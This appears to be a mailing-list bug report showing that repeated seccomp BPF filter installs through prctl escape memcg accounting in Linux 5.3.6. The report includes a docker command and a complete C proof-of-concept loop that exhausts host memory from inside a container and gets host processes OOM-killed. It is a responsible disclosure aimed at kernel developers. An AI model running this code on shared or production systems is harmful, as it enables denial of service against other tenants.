Hello, I found that programs can consume much more memory than memcg limit by setting BPF for many times. It's because that allocations during setting BPF are not charged by memcg. Below is how I did it: 1. Run Linux kernel in a QEMU virtual machine (x86_64) with 1GB physical memory. The kernel is built with memcg and memcg kmem accounting enabled. 2. Create a docker (runC) container, with memory limit 100MB. docker run --name debian --memory 100000000 --kernel-memory 50000000 \ debian:slim /bin/bash 3. In the container, run a program to set BPF for many times. I use prctl to set BPF. while(1) { prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &bpf); } 4. Physical memory usage(the one by `free` or `top`) is increased by around 40MB, but memory usage of the container's memcg doesn't increase a lot (around 100KB). 5. Run several processes to set BPF, and almost all physical memory is consumed. Sometimes some processes not in the container are also killed due to OOM. I also try this with user namespace on, and I can still kill host processes inside container in this way. So this problem may be dangerous for containers that based on cgroups. kernel version: 5.3.6 kernel configuration: in attachment (CONFIG_MEMCG_KMEM is on) This blog also shows this problem: https://blog.xiexun.tech/break-memcg.html Cause of this problem: Memory allocations during setting BPF are not charged by memcg. For example, in kernel/bpf/core.c:bpf_prog_alloc, bpf_prog_alloc_no_stats and alloc_percpu_gfp are called to allocate memory. However, neither of them are charged by memcg. So if we trigger this path for many times, we can consume lots of memory, without increasing our memcg usage. /* ------------ */ struct bpf_prog *bpf_prog_alloc(unsigned int size, gfp_t gfp_extra_flags) { gfp_t gfp_flags = GFP_KERNEL | __GFP_ZERO | gfp_extra_flags; struct bpf_prog *prog; int cpu; prog = bpf_prog_alloc_no_stats(size, gfp_extra_flags); if (!prog) return NULL; prog->aux->stats = alloc_percpu_gfp(struct bpf_prog_stats, gfp_flags); /* ... */ } /* ------------ */ My program that sets BPF: /* ------------ */ #include <unistd.h> #include <sys/prctl.h> #include <linux/prctl.h> #include <linux/seccomp.h> #include <linux/filter.h> #include <linux/audit.h> #include <linux/signal.h> #include <sys/ptrace.h> #include <stdio.h> #include <errno.h> int main() { struct sock_filter insns[] = { { .code = 0x6, .jt = 0, .jf = 0, .k = SECCOMP_RET_ALLOW } }; struct sock_fprog bpf = { .len = 1, .filter = insns }; int ret; ret = prctl(PR_SET_NO_NEW_PRIVS, 1, NULL, 0, 0); if (ret) { printf("error1 %d\n", errno); return 1; } int count = 0; while (1) { ret = prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &bpf); if (ret) { sleep(1); printf("error %d\n", errno); } else { count++; printf("ok %d\n", count); } } return 0; } /* ------------ */ Thanks, Xie Xun
Attachment:
.config
Description: Binary data